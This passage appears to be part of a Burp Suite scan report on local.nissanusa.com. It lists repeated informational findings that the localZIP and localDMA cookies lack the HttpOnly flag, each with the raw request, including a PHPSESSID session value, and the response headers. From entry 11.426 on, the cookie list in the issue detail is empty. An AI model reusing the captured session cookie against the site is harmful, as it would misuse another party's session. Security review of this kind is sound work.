Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=72201; expires=Sat, 05-Feb-2011 04:54:18 GMT; path=/
Set-Cookie: localDMA=little-rock-pine-bluff-ar-area; expires=Sat, 05-Feb-2011 04:54:18 GMT; path=/
Content-Length: 109582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.417. http://local.nissanusa.com/los-angeles-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /los-angeles-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /los-angeles-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=90001; expires=Sat, 05-Feb-2011 04:56:37 GMT; path=/
Set-Cookie: localDMA=los-angeles-area; expires=Sat, 05-Feb-2011 04:56:37 GMT; path=/
Content-Length: 153308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.418. http://local.nissanusa.com/louisville-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /louisville-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /louisville-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=40201; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/
Set-Cookie: localDMA=louisville-area; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/
Content-Length: 118285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.419. http://local.nissanusa.com/miami-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /miami-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /miami-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=33101; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/
Set-Cookie: localDMA=miami-area; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/
Content-Length: 116534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.420. http://local.nissanusa.com/milwaukee-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /milwaukee-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /milwaukee-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=53201; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Set-Cookie: localDMA=milwaukee-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Content-Length: 138619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.421. http://local.nissanusa.com/minneapolis-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /minneapolis-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /minneapolis-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=55401; expires=Sat, 05-Feb-2011 04:52:05 GMT; path=/
Set-Cookie: localDMA=minneapolis-area; expires=Sat, 05-Feb-2011 04:52:05 GMT; path=/
Content-Length: 109350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.422. http://local.nissanusa.com/nashville-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /nashville-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nashville-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=37201; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/
Set-Cookie: localDMA=nashville-area; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/
Content-Length: 119690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.423. http://local.nissanusa.com/new-orleans-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /new-orleans-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /new-orleans-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=70112; expires=Sat, 05-Feb-2011 04:53:37 GMT; path=/
Set-Cookie: localDMA=new-orleans-area; expires=Sat, 05-Feb-2011 04:53:37 GMT; path=/
Content-Length: 114343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.424. http://local.nissanusa.com/new-york-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /new-york-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /new-york-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=10001; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/
Set-Cookie: localDMA=new-york-area; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/
Content-Length: 217093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.425. http://local.nissanusa.com/norfolk-portsmouth-newport-news-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /norfolk-portsmouth-newport-news-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP
localDMA

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /norfolk-portsmouth-newport-news-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=23501; expires=Sat, 05-Feb-2011 04:56:07 GMT; path=/
Set-Cookie: localDMA=norfolk-portsmouth-newport-news-area; expires=Sat, 05-Feb-2011 04:56:07 GMT; path=/
Content-Length: 115633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.426. http://local.nissanusa.com/oklahoma-city-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /oklahoma-city-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oklahoma-city-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=73101; expires=Sat, 05-Feb-2011 04:54:39 GMT; path=/
Set-Cookie: localDMA=oklahoma-city-area; expires=Sat, 05-Feb-2011 04:54:39 GMT; path=/
Content-Length: 107751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.427. http://local.nissanusa.com/orlando-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /orlando-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orlando-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=32801; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Set-Cookie: localDMA=orlando-area; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Content-Length: 131647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.428. http://local.nissanusa.com/philadelphia-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /philadelphia-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /philadelphia-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=19101; expires=Sat, 05-Feb-2011 04:52:32 GMT; path=/
Set-Cookie: localDMA=philadelphia-area; expires=Sat, 05-Feb-2011 04:52:32 GMT; path=/
Content-Length: 205265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.429. http://local.nissanusa.com/phoenix-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /phoenix-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /phoenix-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=85001; expires=Sat, 05-Feb-2011 04:56:47 GMT; path=/
Set-Cookie: localDMA=phoenix-area; expires=Sat, 05-Feb-2011 04:56:47 GMT; path=/
Content-Length: 116937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.430. http://local.nissanusa.com/pittsburgh-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /pittsburgh-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pittsburgh-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:51:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:51:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=15201; expires=Sat, 05-Feb-2011 04:51:59 GMT; path=/
Set-Cookie: localDMA=pittsburgh-area; expires=Sat, 05-Feb-2011 04:51:59 GMT; path=/
Content-Length: 118838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.431. http://local.nissanusa.com/portland-or-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /portland-or-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portland-or-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=97201; expires=Sat, 05-Feb-2011 04:57:39 GMT; path=/
Set-Cookie: localDMA=portland-or-area; expires=Sat, 05-Feb-2011 04:57:39 GMT; path=/
Content-Length: 117033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.432. http://local.nissanusa.com/providence-new-bedford-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /providence-new-bedford-area

Issue detail

